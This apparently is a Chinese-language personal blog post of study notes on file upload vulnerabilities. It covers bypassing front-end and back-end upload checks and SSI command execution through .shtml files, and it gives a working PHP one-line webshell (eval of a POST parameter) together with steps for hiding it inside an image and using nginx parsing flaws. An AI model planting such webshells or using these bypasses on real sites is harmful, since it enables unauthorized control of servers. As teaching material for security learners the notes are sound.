<!DOCTYPE html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="文件上传漏洞"><meta name="author" content="keikei"><meta name="keywords" content=""><meta name="copyright" content="copyright.liscense_type"><title>文件上传漏洞</title><!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]><script src="https://cdn.bootcss.com/html5shiv/3.7.3/html5shiv.min.js"></script><script src="https://cdn.bootcss.com/respond/1.4.2/respond.min.js"></script><![endif]--><link rel="icon" href="/compass/imgs/favicon.ico"><link rel="stylesheet" href="/compass/stylesheets/font-awesome.min.css"><script>var algoliaConfig = {"on":false}</script><link rel="stylesheet" href="/compass/stylesheets/screen.css"><meta name="generator" content="Hexo 5.4.0"></head><body><div id="body-inner-wrapper"><header id="page-header"><nav id="nav"><div id="site-name">My blog</div><i class="fa fa-bars fa-2x" id="nav-icon" aria-hidden="true"></i><div id="nav-expanded"><a class="nav-word-item" href="/">Home</a><a class="nav-word-item" href="/archives">Archives</a><a class="nav-word-item" href="/tags">Tags</a><a class="nav-word-item" href="/categories">Catogories</a></div><div id="nav-list"><ul><li><a class="nav-list-item" href="/">Home</a></li><li><a class="nav-list-item" href="/archives">Archives</a></li><li><a class="nav-list-item" href="/tags">Tags</a></li><li><a class="nav-list-item" href="/categories">Catogories</a></li></ul></div></nav><div id="banner-wrapper"><div id="banner-pagetype-dependent-info"><h1 id="post-title">文件上传漏洞</h1><span id="post-description"><i class="fa fa-calendar" aria-hidden="true"></i> 2021-06-13</span><span id="word-count">The total word count - 1925</span><span id="time-count">Estimated time of reading - 7 mins</span></div></div><a title="Back to Top"><i class="fa fa-arrow-up" id="to-Top" aria-hidden="true"></i></a><a title="Click to Toggle off"><i class="fa fa-toggle-on" id="toggle-on-Toc" aria-hidden="true"></i></a><a title="Click to Toggle on"><i class="fa fa-toggle-off" id="toggle-off-Toc" aria-hidden="true"></i></a></header><aside id="toc-column"><div id="toc-column-inner-wrapper"><div id="post-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E"><span class="toc-text">文件上传漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%BD%A2%E6%88%90%E8%A6%81%E7%B4%A0"><span class="toc-text">1.文件上传漏洞形成要素</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%89%8D%E5%90%8E%E7%AB%AF%E9%AA%8C%E8%AF%81%E6%96%B9%E5%BC%8F%E5%8F%8A%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F"><span class="toc-text">2.文件上传漏洞前后端验证方式及绕过方式</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E5%89%8D%E7%AB%AF%E9%AA%8C%E8%AF%81%EF%BC%9A"><span class="toc-text">1.前端验证：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E5%90%8E%E7%AB%AF%E9%AA%8C%E8%AF%81"><span class="toc-text">2.后端验证</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%EF%BC%8C%E5%B0%8F%E9%A9%AC%EF%BC%8C%E5%A4%A7%E9%A9%AC"><span class="toc-text">3.一句话木马，小马，大马</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-webshell"><span class="toc-text">1.webshell:</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E9%85%8D%E5%90%88%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-text">4.文件上传漏洞配合文件解析漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-php%E5%9B%BE%E7%89%87%E6%9C%A8%E9%A9%AC"><span class="toc-text">1.php图片木马</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-text">2.解析漏洞</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E7%9A%84%E9%87%8D%E8%A6%81%E6%80%A7%EF%BC%9A"><span class="toc-text">1.信息收集的重要性：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link"><span class="toc-text"></span></a></li></ol></li></ol></li></ol></div></div></aside><main id="main-content-column"><div id="main-content-wrapper"><div id="post-full-content"><h1 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h1><p>“基本上所有的站，脚本类型文件后缀都不能上传”</p>
<h3 id="1-文件上传漏洞形成要素"><a href="#1-文件上传漏洞形成要素" class="headerlink" title="1.文件上传漏洞形成要素"></a>1.文件上传漏洞形成要素</h3><p>1.检查上传功能是否完整：文件是否能被上传到服务器</p>
<p>2.上传后是否能找到相对路径</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">动态路径：</span><br><span class="line">脏数据报错：给他错误数据看返回包，有可能返回真正相对路径</span><br></pre></td></tr></table></figure>

<p>3.文件后缀必须为脚本后缀</p>
<p>4.文件内容必须被解析</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">什么是附件存储服务器：</span><br></pre></td></tr></table></figure>

<p>SSI指令：通过在文档中加入SSI指令，让服务器端在输出文档之前解析SSI指令，并把解析完的结果和文档一同输出给客户端。</p>
<p>如何用通过上传shtml文件执行cmd文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.上传一个.bat后缀的文件（windows中执行cmd命令的文件后缀），.bat文件中写入一段cmd命令，</span><br><span class="line">2.上传一个.shtml后缀文件，用于执行.bat文件的命令（&lt;!--#echo var=&quot;文件名&quot;--&gt;）</span><br><span class="line">3.也可以直接把cmd命令写入文件</span><br><span class="line">&lt;!--#exec cmd=&quot;&quot;...&quot;&quot;--&gt;（会执行给定的 shell 命令）</span><br></pre></td></tr></table></figure>



<h3 id="2-文件上传漏洞前后端验证方式及绕过方式"><a href="#2-文件上传漏洞前后端验证方式及绕过方式" class="headerlink" title="2.文件上传漏洞前后端验证方式及绕过方式"></a>2.文件上传漏洞前后端验证方式及绕过方式</h3><h4 id="1-前端验证："><a href="#1-前端验证：" class="headerlink" title="1.前端验证："></a>1.前端验证：</h4><p>这类验证主要时通过前端js验证文件后缀，没有把文件发给服务端验证，所以一般没有发包给服务端</p>
<p><strong>判断方式</strong>：在浏览加载文件，但<strong>还未点击上传按钮时便弹出对话框</strong>，内容如：只允许上传.jpg/.jpeg/.png后缀名的文件，<strong>而此时并没有发送数据包。</strong></p>
<p><strong>绕过方式</strong></p>
<p>1.禁用js</p>
<p>2.审查源码，删除对应验证的js代码</p>
<h4 id="2-后端验证"><a href="#2-后端验证" class="headerlink" title="2.后端验证"></a>2.后端验证</h4><p>1.content-type类型判断：MIME类型判断</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">常见MIME类型</span><br><span class="line">text/plain（纯文本）</span><br><span class="line">text/html（HTML文档）</span><br><span class="line">text/javascript（js代码）</span><br><span class="line">application/xhtml+xml（XHTML文档）</span><br><span class="line">image/gif（GIF图像）</span><br><span class="line">image/jpeg（JPEG图像）</span><br><span class="line">image/png（PNG图像）</span><br><span class="line">video/mpeg（MPEG动画）</span><br><span class="line">application/octet-stream（二进制数据）</span><br><span class="line">application/pdf（PDF文档）</span><br></pre></td></tr></table></figure>



<p>2.后缀黑名单,白名单校验</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1.白名单几乎绕不过</span><br><span class="line">2.如何判断时黑名单校验</span><br><span class="line">抓包，修改文件后缀，随便修改一个不存在的文件后缀，如果能够上传成功，就说明是黑名单校验</span><br></pre></td></tr></table></figure>

<p>3.waf校验</p>
<p>WAF校验，即使用不同的WAF产品来进行过滤，通常是独立与服务程序的一段中间程序或者硬件</p>
<p>安全狗，火绒，D盾之类的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">这些杀软，通常会有病毒库，一般会手机网上出现过的一些病毒</span><br></pre></td></tr></table></figure>

<p>所以要想免杀，自己写的，不是病毒库里的病毒概率很高</p>
<p>4.正则匹配判断</p>
<p>通过自己写正则匹配来判断文件幻数(文件头)内容是否符合要求，一般来说属于白名单的检测，常见的文件头（文件头标志位）如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.JPEG;.JPE;.JPG，”JPGGraphicFile”（FFD8FFFE00）</span><br><span class="line">2.gif，”GIF89A”（474946383961）</span><br><span class="line">3.zip，”ZipCompressed”（504B0304）</span><br><span class="line">4.doc;.xls;.xlt;.ppt;.apr，”MSCompoundDocumentv1orLotusApproachAPRfile”（D0CF11E0A1B11AE1</span><br></pre></td></tr></table></figure>

<p>5.文件加载检测</p>
<p>一般是调用API或函数去进行文件加载测试，例如图像渲染测试，当测试结果正常的时候才允许上传</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1.一次渲染（代码注入）</span><br><span class="line">2.二次渲染:攻击方式是攻击文件加载器自身</span><br></pre></td></tr></table></figure>

<h3 id="3-一句话木马，小马，大马"><a href="#3-一句话木马，小马，大马" class="headerlink" title="3.一句话木马，小马，大马"></a>3.一句话木马，小马，大马</h3><p><strong>一句话木马详解</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @eval($_POST[&#x27;连接菜刀的密码&#x27;]); ?&gt;</span><br><span class="line">@：意思是不报错，即使执行错误，也不报错。</span><br><span class="line">eval:把字符串作为PHP代码执行。</span><br><span class="line">$_POST[&#x27;a&#x27;]; 的意思就是a这个变量，用post的方法接收。</span><br><span class="line">（get与post传输数据的方式：post是在消息体存放数据，get是在消息头的url路径里存放数据）</span><br><span class="line">所以一句话的意思是：用post方法接收变量pw，把变量pw里面的字符串当做php代码来执行。</span><br></pre></td></tr></table></figure>

<p>所以你想执行什么代码，就把代码放入<strong>连接菜刀的密码</strong>这个变量</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">oepndir,readdir(dir是目录),move_uploaded_file,如果执行cmd命令，用exec（）</span><br><span class="line">执行这些函数需要把php配置文件php.ini里，关掉安全模式safe_mode = off，然后再看看 禁用函数列表 disable_functions = proc_open, popen, exec, system, shell_exec ，把exec去掉，确保没有exec（有些cms为了方便处理某些功能，会去掉的）。</span><br></pre></td></tr></table></figure>



<p>参考链接</p>
<p>[<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_39190897/article/details/86772765]">https://blog.csdn.net/weixin_39190897/article/details/86772765]</a>: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">概括：</span><br><span class="line">一句话木马：通常只有一句话，隐蔽性强，可以单独成为一个文件，也可以放入其他文件，例如文件木马</span><br><span class="line">小马:只有一个功能点的木马，通常是为了上传大马，大马通常很大，一般文件上传处都有文件大小限制，或者留个后门给日后方便提权，通常只包含文件上传功能</span><br><span class="line">大马：体积大，包含功能多，包括对数据的管理，命令的操作，数据库的管理，解压缩，和提权等功能这种大马一旦网，站被种了，网站基本就在这个大马控制之中。大马的隐蔽性不好，因为涉及很多敏感代码，容易被杀掉</span><br></pre></td></tr></table></figure>

<h4 id="1-webshell"><a href="#1-webshell" class="headerlink" title="1.webshell:"></a>1.webshell:</h4><p>以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门，通常会将后门文件与正常文件混在一起，当在网页访问这个文件的时候，就可以得到一个命令执行环境，这样就可以达到控制服务器的目的</p>
<h3 id="4-文件上传漏洞配合文件解析漏洞"><a href="#4-文件上传漏洞配合文件解析漏洞" class="headerlink" title="4.文件上传漏洞配合文件解析漏洞"></a>4.文件上传漏洞配合文件解析漏洞</h3><h4 id="1-php图片木马"><a href="#1-php图片木马" class="headerlink" title="1.php图片木马"></a>1.php图片木马</h4><p>若规定是上传的图片，还会对图片进行采集。即使攻击者修改文件类型，也过不了图片采集那一关。所以，这就需要一张图片来做掩护。做成隐藏在图片下的木马。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php中getimagesize（）函数：返回一个数组元素，其中包含图像的高度，宽度，类型，MIME类型等。</span><br></pre></td></tr></table></figure>

<p>&lt;1&gt;.制作图片木马</p>
<p>（1）在一个路径创建一个a.jpg图片文件和一个b.php的一句话木马文件</p>
<p>（2）打开cmd命令行，打开文件所在路径，输入命令copy a.jpg/b+b.php tmp.jpg(这是两个文件合成以后的文件名)</p>
<p><strong>注意：1.图片文件名称一定要先敲，代码文件名称一定要放后面.</strong></p>
<p>​            <strong>2.图片文件名称一定接“/b”，“/b”代表这是一个二进制文件.</strong></p>
<p>（3）用notepad++打开合成的图片马</p>
<h4 id="2-解析漏洞"><a href="#2-解析漏洞" class="headerlink" title="2.解析漏洞"></a>2.解析漏洞</h4><p>1.什么是解析漏洞，例如.jpg格式的文件后有php代码，在访问图片的时候，随便访问一个aaa.php就可以执行php代码，这种解析漏洞在</p>
<p>ngnix中有，所以在信息搜集中，如果判断出服务器是ngnix,就可以试一下这种解析漏洞（可以用<?php phpinfo();?>）,国内网站轻易不要试。</p>
<h4 id="1-信息收集的重要性："><a href="#1-信息收集的重要性：" class="headerlink" title="1.信息收集的重要性："></a>1.信息收集的重要性：</h4><p>我一直没明白信息搜集的重要性，<strong>如果判断出服务器版本，就可以尝试有没有解析漏洞</strong>，慢慢来吧，后面实践多了兴许会发现信息搜集的重要性，判断出是否使用了cms系统也是，还有一些闭源系统，这些系统往往会有很多洞，还是要找一些信息搜集的知识看一看</p>
<h3 id><a href="#" class="headerlink" title></a></h3></div></div></main><div id="pagination-wrapper"><a id="page-prev" href="/2021/06/13/csrf%E6%BC%8F%E6%B4%9E/"><i class="fa fa-chevron-left"></i> csrf漏洞</a></div><footer id="page-footer"><div id="footer-wrapper"><div id="blog-meta">&copy;2017-2021 By keikei | Theme - <a id='theme-name' target="_blank" rel="noopener" href="https://github.com/huan555/lemon-lime"> Lemon-Lime</a> | Power By <a id='theme-powered-by' href=http://hexo.io> Hexo</a></div><div id="viewed-record"><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-eye" aria-hidden="true"></i> <span id="busuanzi_value_page_pv"></span></span></div><div id="copyright-wrapper"><i class="fa fa-cc" aria-hidden="true"></i><div id="copyright">Except where otherwise noted, content on this blog is licensed under <a rel="license" href=http://creativecommons.org/licenses/by-nc-sa/4.0/>CC BY-NC-SA 4.0</a>.</div></div><div id="contact-me"><div id="rss"><a href="/atom.xml" type="application/atom+xml" rel="alternate" target="_blank"><i class="fa fa-rss" aria-hidden="true"></i></a></div><span id="github"><a target="_blank" rel="noopener" href="https://github.com/yourUserName"><i class="fa fa-github" aria-hidden="true"></i></a></span></div></div></footer><script src="/compass/js/blog.js"></script></div></body>